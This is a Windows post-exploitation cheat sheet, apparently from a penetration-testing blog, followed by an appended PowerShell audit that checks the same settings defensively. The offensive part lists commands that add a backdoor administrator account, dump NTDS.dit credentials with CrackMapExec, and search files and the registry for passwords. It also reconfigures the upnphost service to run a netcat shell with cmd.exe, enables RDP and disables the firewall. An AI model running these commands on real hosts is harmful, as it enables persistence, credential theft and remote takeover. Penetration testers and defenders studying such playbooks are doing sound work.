Windows Post Exploitation

What to do when you have either a standard user or SYSTEM on a Windows host. This helps with privilege escalation if needed, but more so with gathering and enumerating as much information about the machine as possible.

net user sp00ks sp00ks /add
net localgroup administrators sp00ks /add 
systeminfo | findstr /B /C:"OS Name" /C:"OS Version"

systeminfo - check which hotfixes are installed (the wmic qfe commands below give the same list with dates)

NTDS.dit dump using Crackmapexec
cme smb -u USERNAME -p 'PASSWORD' -d 'DOMAIN' --ntds --exec-method smbexec

findstr /s /n /i /p /c:"password" *.txt
netsh firewall show state

schtasks /query /fo LIST /v

tasklist /SVC


wmic qfe get Caption,Description,HotFixID,InstalledOn

wmic qfe get Caption,Description,HotFixID,InstalledOn | findstr /C:"KB.." /C:"KB.."

reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer\AlwaysInstallElevated

reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer\AlwaysInstallElevated
accesschk.exe -ucqv Spooler
accesschk.exe -uwcqv "Authenticated Users" *
accesschk.exe -ucqv SSDPSRV
accesschk.exe -ucqv upnphost

sc qc upnphost
sc config upnphost binpath= "C:\nc.exe -nv 9988 -e C:\WINDOWS\System32\cmd.exe"
sc config upnphost obj= ".\LocalSystem" password= ""
sc qc upnphost

dir /s *pass* == *cred* == *vnc* == *.config*
findstr /si password *.xml *.ini *.txt

reg query HKLM /f password /t REG_SZ /s
reg query HKCU /f password /t REG_SZ /s

type %WINDIR%\System32\drivers\etc\hosts
net user
net groups
net accounts /domain
cd C:\ & dir /S "proof.txt"
cd C:\ & dir /S "network-secret.txt"
netstat -pantob TCP
netstat -pantob UDP
start cmd.exe /k notepad.exe
Enable RDP
reg add "hklm\system\currentcontrolset\control\terminal server" /f /v fDenyTSConnections /t REG_DWORD /d 0
netsh firewall set service remoteadmin enable
netsh firewall set service remotedesktop enable

Disable/Enable Firewall - Win XP/2003
netsh firewall set opmode mode=DISABLE 
netsh firewall set opmode mode=ENABLE

Check the firewall logs, if they exist

View all listening services
netstat -an |find /i "listening"

OS Name?
OS Version?
System Type?
Scheduled Tasks? (run 'at' or 'schtasks')
Password Policy? (net accounts /domain)
Hosts file output? (type %WINDIR%\System32\drivers\etc\hosts)
Firewall rules? (netsh advfirewall firewall)
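An added defender-side audit, not from the original post, that checks the same settings the commands above enumerate so they can be remediated: AlwaysInstallElevated in both hives, the RDP flag, disabled firewall profiles, and local Administrators membership. It assumes PowerShell 5.1 or later with the NetSecurity (Get-NetFirewallProfile) and LocalAccounts (Get-LocalGroupMember) modules that ship with current Windows; $expectedAdmins is a placeholder baseline to adjust per host.

```powershell
# Added audit example (not part of the original post). Assumes PowerShell 5.1+ with the
# NetSecurity (Get-NetFirewallProfile) and LocalAccounts (Get-LocalGroupMember) modules.
function Get-PostExploitationAudit {
    $findings = @()

    # AlwaysInstallElevated only lets a user run MSIs as SYSTEM when BOTH hives are set to 1.
    $hives = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\Installer',
             'HKCU:\SOFTWARE\Policies\Microsoft\Windows\Installer'
    $elevated = foreach ($h in $hives) {
        (Get-ItemProperty -Path $h -Name AlwaysInstallElevated -ErrorAction SilentlyContinue).AlwaysInstallElevated
    }
    if (@($elevated | Where-Object { $_ -eq 1 }).Count -eq 2) {
        $findings += 'AlwaysInstallElevated = 1 in HKLM and HKCU: set both to 0 or remove the policy.'
    }

    # fDenyTSConnections = 0 means RDP is enabled; flag it on hosts not meant to expose RDP.
    $ts = Get-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Control\Terminal Server' `
                           -Name fDenyTSConnections -ErrorAction SilentlyContinue
    if ($ts -and $ts.fDenyTSConnections -eq 0) {
        $findings += 'RDP is enabled (fDenyTSConnections = 0); confirm this host should accept RDP.'
    }

    # Any firewall profile that is switched off (modern equivalent of "netsh firewall show state").
    Get-NetFirewallProfile | Where-Object { -not $_.Enabled } | ForEach-Object {
        $findings += "Firewall profile '$($_.Name)' is disabled."
    }

    # Local Administrators membership compared against a baseline. $expectedAdmins is a
    # constructed placeholder; replace it with the accounts that belong on this host.
    $expectedAdmins = @('Administrator')
    Get-LocalGroupMember -Group 'Administrators' | ForEach-Object {
        $name = ($_.Name -split '\\')[-1]
        if ($expectedAdmins -notcontains $name) {
            $findings += "Unexpected member of local Administrators: $($_.Name)"
        }
    }

    return $findings
}

$results = Get-PostExploitationAudit
if ($results.Count -eq 0) { 'No findings.' } else { $results }
```

Run it from an elevated prompt so the HKLM and firewall queries succeed; each finding names the setting to correct.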
